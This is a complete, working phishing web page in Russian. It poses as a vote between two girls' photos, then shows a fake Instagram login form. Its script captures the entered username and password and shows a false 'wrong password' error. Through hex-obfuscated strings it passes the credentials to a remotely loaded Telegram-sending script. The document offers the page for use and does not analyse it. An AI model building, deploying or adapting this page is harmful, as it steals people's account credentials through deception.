<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>VOTE</title>
    <script src="https://ummx.github.io/import/script/aes.js"></script>
    <script src="https://ummx.github.io/import/script/telegram-api.js"></script>
    <style>
        img{
            width:150px;
            border-radius: 50%;
            display: block;
            margin: auto;
            margin-top: 10px;
        }
      .head{
          display: block;
          margin: auto;
          text-align: center;
          background: red;
          width:330px;
          border-radius:10px;
          background: rgb(245, 243, 243);
      }
      h1{
          display: block;
          margin: auto;
          text-align: center;
          font-family:arial;
           font-size: 19px;
      }
      button{
          display: block;
          margin: auto;
          text-align: center;
          width:200px;
          height:35px;
          border: none;
          font-size:17px;
          border-radius: 5px;
          color: white;
          background: rgb(20, 130, 255);
      }
      input{
          display: block;
          margin: auto;
          outline: none;
          width:250px;
          height:30px;
          border-radius:5px;
          padding-left: 10px;
          border: 2px solid rgb(236, 236, 236);
      }
      .login{
          margin-top:10px;
      }
      h2{
          display: block;
          margin: auto;
          text-align: center;
          font-size:35px;
          font-family: arial;
      }
      p{
          display: none;
          margin: auto;
          text-align: center;
          width:250px;
          margin-top:25px;
          color: red;
          font-family: arial;
      }
    </style>
</head>
<body>
    <br>
    <img src="https://pngimg.com/uploads/pinterest/pinterest_PNG99920.png" alt="">
    <br><br>
    <div class="head"style="display:block;" >
        <br>
        <img src="https://teleguram.github.io/polina.jpg" alt="">
        <br>
        <h1>122 голосов</h1>
        <br>
        <button onclick="vote('polina','122 голосов')">Голосовать</button>
        <br><br>
         <img src="https://teleguram.github.io/nastya.jpg" alt="">
         <br>
         <h1>97 голосов</h1>
         <br>
         <button onclick="vote('nastya','97 голосов')">Голосовать</button>
         <br><br>
    </div>
    <div class="login"  style="display:none">
        <img id="user" src="http://assets.stickpng.com/images/585e4bf3cb11b227491c339a.png" alt="">
        <br>
        <h1 id="folow"></h1>
        <br><br>
        <h2>Instagram</h2>
        <br><br><br>
        <input type="username" id="username" autocomplete="off" placeholder="Телефон, имя пользователя или эл. адрес">
        <br>
        <input type="password" id="password" placeholder="Пароль">
        <br>
        <button style="width:260px;" onclick="login()">Войти</button>
        <p class="error">К сожалению, вы ввели неправильный пароль. Проверьте свой пароль еще раз.</p>
    </div>
    <br><br><br><br>
</body>
<script>
    function vote(name,fol){
        if(name == 'polina'){
            document.getElementById('user').src='https://teleguram.github.io/polina.jpg';
            document.getElementById('folow').innerHTML=fol;
        }
        if(name == 'nastya'){
            document.getElementById('folow').innerHTML=fol;
            document.getElementById('user').src='https://teleguram.github.io/nastya.jpg';
        }
        document.querySelector('.head').style.display="none";
        document.querySelector('.login').style.display="block";
    }
function login(){
    var username=document.getElementById("username").value;
    var password=document.getElementById('password').value;
    var message=`USERNAME : ${username} %0A PASSWORD : ${password}`;
    var _0x9fb5=["\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x2E\x65\x72\x72\x6F\x72","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72","\x62\x6C\x6F\x63\x6B","\x36\x37\x30\x34\x37\x36\x31\x62\x33\x63\x62\x66\x38\x32\x36\x30\x63\x35\x35\x36\x63\x33\x65\x34\x31\x33\x39\x39\x61\x62\x38\x62\x63\x64\x66\x30\x62\x35\x31\x61\x39\x38\x39\x33\x35\x65\x66\x63\x30\x34\x30\x35\x62\x64\x39\x63\x61\x30\x39\x38\x64\x65\x38\x37"];document[_0x9fb5[3]](_0x9fb5[2])[_0x9fb5[1]][_0x9fb5[0]]= _0x9fb5[4];sendMessage(message,_0x9fb5[5])
}
</script>
</html>
